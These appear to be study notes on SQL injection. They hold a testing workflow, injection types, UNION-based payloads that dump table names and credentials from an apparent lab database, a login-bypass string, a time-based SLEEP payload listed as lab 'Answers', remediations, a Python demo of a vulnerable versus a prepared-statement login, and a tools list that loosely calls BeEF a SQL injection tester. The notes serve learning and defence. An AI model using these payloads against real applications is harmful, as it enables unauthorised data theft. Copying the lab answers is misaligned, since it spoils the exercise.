SQL Injection

Description

SQL Injection is a security vulnerability in web applications that use an SQL database as their back end. It allows an attacker to inject malicious code into an SQL statement and have it executed by the database, which can result in unauthorized access to sensitive information, data modification, or even data deletion. The vulnerability arises when user-supplied input is not properly validated and escaped before being used in an SQL query. By exploiting SQL Injection, an attacker can bypass authentication mechanisms, retrieve sensitive information such as passwords, and execute arbitrary commands on the database server.

Techniques

The following are the steps for using SQL Injection as a penetration tester:

Discover: Find out if the web application is vulnerable to SQL Injection by manually sending crafted input to the application and observing its behavior.

Exploit: If the application is found to be vulnerable, use tools and techniques to exploit the vulnerability and gain access to sensitive data.

Assessment: Once the vulnerability has been exploited, assess the impact of the vulnerability by examining the data that has been exposed, the privileges that have been gained, and the potential for further exploitation.

Reporting: Provide a report to the organization that details the vulnerability, its impact, and the recommended remediation steps.

Types

UNION-based SQL injection: This type of SQL injection exploits the UNION SQL operator to combine the results of multiple SELECT statements into a single result set.

Error-based SQL injection: This type of SQL injection is based on error messages generated by the database in response to malicious input.

Blind SQL injection: This type of SQL injection is performed when an attacker is unable to see the results of their attacks directly, but must infer the results through indirect means such as observing changes in application behavior.

Boolean-based SQL injection: This type of SQL injection is based on the use of Boolean operators to manipulate the behavior of an SQL statement.

Time-based SQL injection: This type of SQL injection exploits the time it takes for an SQL statement to execute to extract information from a database.

Resources

select * from users;

select username,password from users;

select * from users where username='admin';

select * from users where username != 'admin';

select * from users where username='admin' or username='jon';

select * from users where username='admin' and password='p4ssword';

select * from users where username like 'a%';

select * from users where username like '%n';

select * from users where username like '%mi%';

The UNION statement combines the results of two or more SELECT statements into a single result set:

SELECT name,address,city,postcode from customers UNION SELECT company,address,city,postcode from suppliers;

insert into users (username,password) values ('bob','password123');

update users SET username='root',password='pass123' where username='admin';

delete from users where username='martin';

delete from users;

In-Band SQL Injection

Error-Based SQL Injection

Union-Based SQL Injection

0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'

0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR ' ') FROM staff_users

select * from users where username='%username%' and password='%password%' LIMIT 1;

' OR 1=1;--

select * from users where username='' and password='' OR 1=1;

Answers:

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR ' ') FROM staff_users

referrer=admin123' UNION SELECT SLEEP(5),2 from users where username like 'admin' and password like '4961';

Remediation:

Prepared Statements (With Parameterized Queries)

Input Validation

Escaping User Input
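As an added example (not code from the original page), the login query from the In-Band section built by string substitution sits beside its prepared-statement form, run against a constructed in-memory SQLite `users` table; `make_db`, `vulnerable_login`, `safe_login` and `is_valid_username` are names chosen for this demo, and the sample rows are made up.

```python
import re
import sqlite3

# Constructed sample data standing in for the page's `users` table.
SAMPLE_USERS = [("admin", "p4ssword"), ("jon", "letmein")]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, username, password):
    """The page's query with %username%/%password% substituted as text.

    Whatever the user types becomes part of the SQL, so the input
    ' OR 1=1;-- turns the WHERE clause into ... OR 1=1 and comments
    out the rest, returning the first row (admin) with no credentials.
    """
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}' LIMIT 1")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Prepared statement: the query text is fixed, values travel separately.

    The same ' OR 1=1;-- input is compared literally against the password
    column and simply matches nothing.
    """
    sql = "SELECT username FROM users WHERE username=? AND password=? LIMIT 1"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Input validation as a second layer: an allow-list of username characters.
# It is a defence in depth, not a substitute for parameterization.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def is_valid_username(username):
    """Return True only for usernames made of allow-listed characters."""
    return USERNAME_RE.fullmatch(username) is not None


if __name__ == "__main__":
    payload = "' OR 1=1;--"
    print("vulnerable:", vulnerable_login(make_db(), "", payload))  # admin
    print("prepared:  ", safe_login(make_db(), "", payload))        # None
```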

Tools

sqlmap: A popular tool that automates the process of detecting and exploiting SQL Injection vulnerabilities.

OWASP ZAP: A web application security scanner that can detect SQL Injection vulnerabilities and other types of vulnerabilities.

Burp Suite: A comprehensive web application security testing platform that includes features for detecting and exploiting SQL Injection vulnerabilities.

BeEF: A browser exploitation framework that can be used to test for SQL Injection vulnerabilities.

sqlninja: A tool specifically designed for exploiting SQL Injection vulnerabilities in Microsoft SQL Server.

Havij: An automated SQL Injection tool that can be used to test for vulnerabilities in web applications.

Absinthe: An automated SQL Injection tool that can be used to test for vulnerabilities in web applications.

SQL Injection

  • http://pentestmonkey.net/category/cheat-sheet/sql-injection

  • https://github.com/Xyntax/CDK/wiki
